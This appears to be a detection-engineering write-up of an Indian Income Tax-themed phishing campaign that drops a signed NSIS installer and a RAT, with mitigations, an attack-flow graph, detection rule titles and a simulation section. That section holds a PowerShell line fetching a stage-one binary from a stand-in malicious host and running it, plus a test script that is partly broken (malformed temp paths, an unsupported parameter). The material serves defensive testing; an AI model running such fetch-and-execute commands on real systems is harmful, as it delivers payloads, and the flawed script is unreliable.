Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A phishing operation spoofing the Indian Income Tax Department delivers a booby-trapped PDF that funnels recipients to a counterfeit compliance portal. The site prompts victims to download a ZIP package containing a signed NSIS installer, which then deploys a multi-stage Remote Access Trojan. The RAT persists by creating a Windows service and talks to multiple C2 servers over non-standard ports.
Investigation
Researchers analyzed the PDF lure, the embedded URL, and the chained NSIS installer workflow. They documented the binaries dropped to disk, the creation of a concealed installation folder, and the registration of NSecRTS.exe as a Windows service. The write-up also captured outbound communications to three IP addresses and highlighted the use of signed payloads throughout the delivery chain.
Mitigation
Block the malicious domain and related IP addresses at the perimeter and through proxy controls. Strengthen email protections to flag tax-themed attachments and links leading to lookalike compliance portals. Prevent automatic execution of untrusted installers where possible, and monitor for suspicious service creation—especially anything named “Windows Real-time Protection Service.”
Response
Alert on the listed filenames, hashes, and Windows service registration activity tied to the infection chain. Isolate impacted endpoints, acquire memory and disk images, and run a full forensic sweep to identify any additional RAT stages or tooling. Remove persistence artifacts and reset potentially exposed credentials to prevent re-entry.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 classDef file fill:#e6e6e6 %% Nodes u2013 Actions (MITRE Techniques) action_phishing_attachment["<b>Action</b> – T1566.001: <b>Spearphishing Attachment</b><br/>Email with malicious PDF u201cReview Annexure.pdfu201d delivered to victim."] class action_phishing_attachment action action_phishing_link["<b>Action</b> – T1566.002: <b>Spearphishing Link</b><br/>PDF contains link to fake Income Tax portal (hxxps://www.akjys.top/)."] class action_phishing_link action action_user_execution["<b>Action</b> – T1204.002: <b>User Execution</b><br/>Victim clicks link, zip file autou2011downloads and installer is run."] class action_user_execution action action_code_signing["<b>Action</b> – T1553.002: <b>Code Signing</b><br/>NSIS installers signed with legitimateu2011looking certificates."] class action_code_signing action action_signed_binary_proxy["<b>Action</b> – T1218: <b>Signed Binary Proxy Execution</b><br/>Signed NSIS installer launches malicious payload, bypassing controls."] class action_signed_binary_proxy action action_obfuscation["<b>Action</b> – T1027.002: <b>Software Packing</b><br/>Multiu2011stage NSIS wrappers encrypt and hide malicious binaries."] class action_obfuscation action action_persistence_service_perm["<b>Action</b> – T1574.010: <b>Services File Permissions Weakness</b><br/>Installer modifies service file permissions."] class action_persistence_service_perm action action_persistence_service["<b>Action</b> – T1569.002: <b>Service Execution</b><br/>Registers NSecRTS.exe as Windows service u201cWindows Realu2011time Protection Serviceu201d."] class action_persistence_service action action_discovery_system["<b>Action</b> – T1082: <b>System Information Discovery</b><br/>RAT collects OS version, hardware details."] class action_discovery_system action action_discovery_software["<b>Action</b> – T1518: <b>Software Discovery</b><br/>RAT enumerates installed applications and services, stores data in C:\Program Files\Common Files\NSEC\Data."] class action_discovery_software action action_c2_web["<b>Action</b> – T1071.001: <b>Web Protocols</b><br/>C2 communication over HTTP/HTTPS."] class action_c2_web action action_c2_nonstandard["<b>Action</b> – T1571: <b>Nonu2011Standard Port</b><br/>Uses ports 48991, 48992, 3898 for C2 traffic."] class action_c2_nonstandard action action_c2_bidirectional["<b>Action</b> – T1102.002: <b>Bidirectional Web Service</b><br/>Enables twou2011way communication with server."] class action_c2_bidirectional action action_remote_access["<b>Action</b> – T1219: <b>Remote Access Tools</b><br/>Attacker executes commands, exfiltrates data, maintains control."] class action_remote_access action action_exfiltration_scheduled["<b>Action</b> – T1029: <b>Scheduled Transfer</b><br/>Harvested data periodically POSTed to C2 server."] class action_exfiltration_scheduled action action_defense_evasion["<b>Action</b> – T1070.004: <b>File Deletion</b><br/>Loader removes dropped files and temporary folders after execution."] class action_defense_evasion action action_multi_stage["<b>Action</b> – T1104: <b>Multiu2011Stage Channels</b><br/>Successive installers deliver final RAT payload."] class action_multi_stage action %% Nodes u2013 Tools / Files / Malware tool_nsis_installer["<b>Tool</b> – <b>Name</b>: NSIS Installer<br/><b>Description</b>: Signed installer used to bootstrap payload."] class tool_nsis_installer tool malware_rat["<b>Malware</b> – <b>Name</b>: NSEC RAT<br/><b>Description</b>: Remote access trojan providing full system control."] class malware_rat malware file_pdf["<b>File</b> – <b>Name</b>: Review Annexure.pdf<br/><b>Type</b>: Malicious PDF attachment."] class file_pdf file file_zip["<b>File</b> – <b>Name</b>: Review Annexure.zip<br/><b>Type</b>: Archive containing NSIS installer."] class file_zip file file_exe["<b>File</b> – <b>Name</b>: NSecRTS.exe<br/><b>Type</b>: Service executable registered with Windows."] class file_exe file %% Connections u2013 Attack Flow action_phishing_attachment –>|contains| file_pdf file_pdf –>|links to| action_phishing_link action_phishing_link –>|leads to| file_zip file_zip –>|executed by| action_user_execution action_user_execution –>|uses| tool_nsis_installer tool_nsis_installer –>|signed with| action_code_signing action_code_signing –>|enables| action_signed_binary_proxy action_signed_binary_proxy –>|obfuscates via| action_obfuscation action_obfuscation –>|creates| malware_rat malware_rat –>|installed as| action_persistence_service_perm action_persistence_service_perm –>|enables| action_persistence_service action_persistence_service –>|executes| file_exe file_exe –>|collects via| action_discovery_system file_exe –>|collects via| action_discovery_software action_discovery_system –>|sends data to| action_c2_web action_discovery_software –>|sends data to| action_c2_web action_c2_web –>|uses ports| action_c2_nonstandard action_c2_web –>|uses channel| action_c2_bidirectional action_c2_bidirectional –>|provides| action_remote_access action_remote_access –>|performs| action_exfiltration_scheduled action_exfiltration_scheduled –>|triggers| action_defense_evasion action_defense_evasion –>|precedes| action_multi_stage %% Styling class tool_nsis_installer, file_pdf, file_zip, file_exe tool class malware_rat malware class action_* action "
Attack Flow
Detections
Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
View
IOCs (DestinationIP) to detect: Indian Income Tax-Themed Phishing Campaign Targets Local Businesses
View
IOCs (SourceIP) to detect: Indian Income Tax-Themed Phishing Campaign Targets Local Businesses
View
IOCs (HashMd5) to detect: Indian Income Tax-Themed Phishing Campaign Targets Local Businesses
View
Detection of Malware Execution in Indian Income Tax-Themed Phishing Campaign [Windows Process Creation]
View
Detection of NSecRTS.exe C2 Communication [Windows Network Connection]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An adversary delivers a phishing email titled “Income Tax Notice”. The attachment is a malicious Word document that dropssetup_Ir5swQ3EpeuBpePEpew=.exeto%TEMP%. The victim executes the file, which in turn spawnsSibuia.exe(the true payload) as its child. This child‑parent chain is designed to bypass generic process‑creation alerts but is caught by the Sigma rule.Steps performed on the compromised host:
- Drop the first-stage binary:
$stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1 - Execute the first-stage binary:
Start-Process -FilePath $stage1 -NoNewWindow - The first-stage binary internally creates the second-stage binary
Sibuia.exein the same directory and launches it: (Simulated by the test script below.)
- Drop the first-stage binary:
-
Regression Test Script:
The script below reproduces the exact parent‑child relationship required to fire the rule.# ------------------------------------------------- # Simulation of Indian Income‑Tax phishing chain # ------------------------------------------------- # Define paths $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" $stage2 = "$env:TEMPSibuia.exe" # Create dummy binaries (zero‑byte – sufficient for Sysmon logging) Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII # Ensure files are executable (Windows does not need chmod) Write-Host "[*] Launching stage1..." $proc1 = Start-Process -FilePath $stage1 -PassThru # Give stage1 a moment to “spawn” stage2 (simulated by direct launch) Start-Sleep -Milliseconds 500 Write-Host "[*] Stage1 spawning stage2 (Sibuia.exe)..." $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host "[+] Simulation complete. Verify detection in SIEM." # ------------------------------------------------- -
Cleanup Commands:
Remove the artifacts and terminate any lingering processes.# Stop any leftover processes Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force # Delete files Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue Write-Host "[*] Cleanup complete."